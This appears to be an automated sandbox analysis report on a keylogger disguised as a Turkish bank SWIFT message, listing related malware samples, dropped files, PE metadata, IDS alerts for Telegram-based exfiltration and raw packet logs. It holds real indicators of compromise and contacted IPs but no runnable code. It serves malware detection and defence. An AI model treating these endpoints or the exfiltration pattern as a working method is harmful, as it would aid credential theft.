                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        54328bd36c14bd82ddaa0c04b25ed9adTEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 172.67.177.134
                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        hesaphareketi-01.pdfsxlx..exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 172.67.177.134
                                                                        malware.ps1Get hashmaliciousMassLogger RATBrowse
                                                                        • 172.67.177.134
                                                                        Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 172.67.177.134
                                                                        QUOTES REQUEST FOR PRICES.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 172.67.177.134
                                                                        T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 172.67.177.134
                                                                        peks66Iy06.exeGet hashmaliciousUnknownBrowse
                                                                        • 172.67.177.134
                                                                        3b5074b1b5d032e5620f69f9f700ff0eShareGate.24.12.1.msiGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        http://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        c2.htaGet hashmaliciousXWormBrowse
                                                                        • 149.154.167.220
                                                                        Hydra.ccLoader.batGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                        • 149.154.167.220
                                                                        full.exeGet hashmaliciousQuasarBrowse
                                                                        • 149.154.167.220
                                                                        fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                        • 149.154.167.220
                                                                        hoTwj68T1D.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        4JwhvqLe8n.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        fIPSLgT0lO.exeGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                        Category:dropped
                                                                        Size (bytes):71954
                                                                        Entropy (8bit):7.996617769952133
                                                                        Encrypted:true
                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):328
                                                                        Entropy (8bit):3.142217153610141
                                                                        Encrypted:false
                                                                        SSDEEP:6:kKGInT9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:eaqDnLNkPlE99SNxAhUe/3
                                                                        MD5:B9C26F1EC2296B95D7E4A9A85CAF89E7
                                                                        SHA1:ED42857A8DB0EA8A68EF1BD609A84D524C3B0348
                                                                        SHA-256:1AB9F7DEC23C53B8587EEA84926B02CD88A9D70FA0AE062D8967E33B89CF7C80
                                                                        SHA-512:2D65FB44582589731F01C17622754C2F4CDD5F68ED422D2D476D1451E6794F606CA7B65B6093309C28ABD470A494D7141C834B4C30A1E48349461E15F321412A
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:p...... ........i.......(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ziraat Bankasi Swift Mesaji.exe.log

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1216
                                                                        Entropy (8bit):5.34331486778365
                                                                        Encrypted:false
                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                        Malicious:true
                                                                        Reputation:high, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                        C:\Users\user\Documents\NOVA\Captured.png

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):675495
                                                                        Entropy (8bit):7.923180725019646
                                                                        Encrypted:false
                                                                        SSDEEP:12288:vDK0M3lTvUMqFppcFKYMR85abi1MdBv3gu3XrGxpkWk1UyK0:vo1DqFpprBRq5ozaklGyH
                                                                        MD5:87D0CEDFFE8984F66FB308BD12BF7731
                                                                        SHA1:12FB202E5BBCCD2E0B7CAB11511C846534444B27
                                                                        SHA-256:98527CB12989B9B798E84C8B740594E0E4F454FFFB66FA879DE1D68E327748FA
                                                                        SHA-512:ABA60175131FBA922C3372E448F374253BAAC771CD3AF1A4C7CFA8B030350B36A654E1BF6CC69CCF14C6A47529851B7A84066BC77C17173737DACA2AB4CBDC93
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.....G...fVm..uf.L.3..3M......gz.{..h.zh@.{/$...{o......"...........B.!.....q.....2..*k.-Q{.gE..}..U[.H....;.c.I...<9..;&....g...H.G/....wXb.t.6w:_....'.Q|.2U...k.,...g.~.....c..M..;../,....].S...~....g.^.t.|hNL}Z<2.....!L.>...zh$S...~..v.I....sb.......L-....[.S..wq..=....w..TE..w-....l...]i..w...;.2.^....{..`...L...y....[.~>'..>?.o.i(..So.Y......7...}..Z..8.eo..+.So.q(...z.......z..}.[....u...k..z];.Z.z.z.Ogx.-..t..w.._.:..:-..O......+.)L...2..j8.T..by...9.{.U...AW..|~.O..L...=......g5.V../......W..U..6.80.q..i.......;xn..W....H._.k...../....}.K...^..9../..-...3....*...rb..q.uy...c=.........XC....-.;...zz..cm...%ml.~W....s..k.W..........2N......v.(uw...5..;.V.;.^P...l......H.......?.../...-.-..K>s.....\.....9..|j....;_....3.0..E.....N......pA....2_.s...b...k.c..w....t.{.W...s;..y.z...n....v.s...q.@n...w.c^...Y.......9%.Z}..EN.

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):7.579506840164801
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:Ziraat Bankasi Swift Mesaji.exe
                                                                        File size:668'160 bytes
                                                                        MD5:00f8c8c1f90e631ebfbfcee425ef7bf7
                                                                        SHA1:fcfa4abf5c184b4fd3df38d2980544c33dbcbd1d
                                                                        SHA256:a9510229f4802ae23ce7e8606ec144245afacc864a8391e3c640e1da2ebd524a
                                                                        SHA512:c0b3e6b470927502f7404954e0dd4b95fe048b927ae2e01b2b08be58a22069866e5d8be54976e6fd03b874c1b5cb101bd88c5dcf8c5158e5f3d706bdad18b516
                                                                        SSDEEP:12288:qjlIpHtMPku+l0CPPe4U/4WIlYO3z33t9BvuIa0oGx/Tc7uEt9dP:qjlIhSPd+p0ylDz33t/e0xZQKi9dP
                                                                        TLSH:6AE4BFC03B2A7701DEACB934857AEDBC62541E74B004B8F36EED2B57B6991126E1CF50
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Zg..............0......$......J*... ...@....@.. ....................................@................................

                                                                        File Icon

                                                                        Icon Hash:37c38329a3924d33

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4a2a4a
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x675AD7E1 [Thu Dec 12 12:32:33 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xa29f80x4f.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa40000x21e0.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xa80000xc.reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x20000xa0a500xa0c002adf7d1837a63aa1f559c97d7f8e1f06False0.8579898911353032data7.5795061926394425IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                        .rsrc0xa40000x21e00x22004d4da9333b81f42e7ba41250b5ec89d0False0.9307215073529411data7.620579687357854IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .reloc0xa80000xc0x2002d70b1d9ea67a29ad22cc577b9358cb8False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0xa40c80x1e1fPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9939048113085203
                                                                        RT_GROUP_ICON0xa5ef80x14data1.05
                                                                        RT_VERSION0xa5f1c0x2c0data0.4602272727272727

                                                                        Imports

                                                                        DLLImport
                                                                        mscoree.dll_CorExeMain

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-12-12T21:38:38.072058+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549707193.122.6.16880TCP
                                                                        2024-12-12T21:38:45.892919+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549707193.122.6.16880TCP
                                                                        2024-12-12T21:38:48.037457+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.549711149.154.167.220443TCP
                                                                        2024-12-12T21:38:49.799108+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549712193.122.6.16880TCP
                                                                        2024-12-12T21:40:39.017978+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550004193.122.6.16880TCP
                                                                        2024-12-12T21:41:02.318920+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550051193.122.6.16880TCP
                                                                        2024-12-12T21:41:18.017919+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550061193.122.6.16880TCP
                                                                        2024-12-12T21:41:29.680454+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550069193.122.6.16880TCP
                                                                        2024-12-12T21:42:17.207223+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.550098193.122.6.16880TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 12, 2024 21:38:36.108573914 CET4970780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:38:36.228365898 CET8049707193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:38:36.228445053 CET4970780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:38:36.228769064 CET4970780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:38:36.349359989 CET8049707193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:38:37.550295115 CET8049707193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:38:37.554390907 CET4970780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:38:37.700468063 CET8049707193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:38:38.025604010 CET8049707193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:38:38.072057962 CET4970780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:38:38.368037939 CET49709443192.168.2.5172.67.177.134
                                                                        Dec 12, 2024 21:38:38.368076086 CET44349709172.67.177.134192.168.2.5
                                                                        Dec 12, 2024 21:38:38.368263960 CET49709443192.168.2.5172.67.177.134
                                                                        Dec 12, 2024 21:38:38.373616934 CET49709443192.168.2.5172.67.177.134
                                                                        Dec 12, 2024 21:38:38.373625994 CET44349709172.67.177.134192.168.2.5
                                                                        Dec 12, 2024 21:38:39.648375988 CET44349709172.67.177.134192.168.2.5
                                                                        Dec 12, 2024 21:38:39.648516893 CET49709443192.168.2.5172.67.177.134
                                                                        Dec 12, 2024 21:38:39.667601109 CET49709443192.168.2.5172.67.177.134
                                                                        Dec 12, 2024 21:38:39.667639017 CET44349709172.67.177.134192.168.2.5
                                                                        Dec 12, 2024 21:38:39.668798923 CET44349709172.67.177.134192.168.2.5
                                                                        Dec 12, 2024 21:38:39.720990896 CET49709443192.168.2.5172.67.177.134
                                                                        Dec 12, 2024 21:38:39.744544983 CET49709443192.168.2.5172.67.177.134
                                                                        Dec 12, 2024 21:38:39.787337065 CET44349709172.67.177.134192.168.2.5
                                                                        Dec 12, 2024 21:38:40.180213928 CET44349709172.67.177.134192.168.2.5
                                                                        Dec 12, 2024 21:38:40.180289984 CET44349709172.67.177.134192.168.2.5
                                                                        Dec 12, 2024 21:38:40.180356026 CET49709443192.168.2.5172.67.177.134
                                                                        Dec 12, 2024 21:38:40.216259003 CET49709443192.168.2.5172.67.177.134
                                                                        Dec 12, 2024 21:38:45.432900906 CET4970780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:38:45.552781105 CET8049707193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:38:45.842670918 CET8049707193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:38:45.892919064 CET4970780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:38:45.986876965 CET49711443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:45.986922979 CET44349711149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:45.987032890 CET49711443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:45.987900019 CET49711443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:45.987912893 CET44349711149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:47.380567074 CET44349711149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:47.380646944 CET49711443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:47.385694981 CET49711443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:47.385708094 CET44349711149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:47.386152983 CET44349711149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:47.387722015 CET49711443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:47.435333967 CET44349711149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:47.435400963 CET49711443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:47.435411930 CET44349711149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:48.037493944 CET44349711149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:48.037672997 CET44349711149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:48.037717104 CET49711443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:48.037997007 CET49711443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:48.354468107 CET4970780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:38:48.355823994 CET4971280192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:38:48.474878073 CET8049707193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:38:48.474950075 CET4970780192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:38:48.475533962 CET8049712193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:38:48.475611925 CET4971280192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:38:48.475776911 CET4971280192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:38:48.602490902 CET8049712193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:38:49.754672050 CET8049712193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:38:49.770656109 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:49.770695925 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:49.770982981 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:49.771662951 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:49.771673918 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:49.799108028 CET4971280192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:38:51.149914980 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.152075052 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.152111053 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.152492046 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.152506113 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.152960062 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.152973890 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153093100 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153106928 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153204918 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153213978 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153223038 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153235912 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153356075 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153367043 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153386116 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153393030 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153402090 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153408051 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153472900 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153481960 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153496981 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153507948 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153511047 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153516054 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153538942 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153543949 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153640985 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153656006 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153670073 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153676033 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153723001 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153729916 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153745890 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153752089 CET44349716149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:38:51.153760910 CET49716443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:38:51.153765917 CET44349716149.154.167.220192.168.2.5
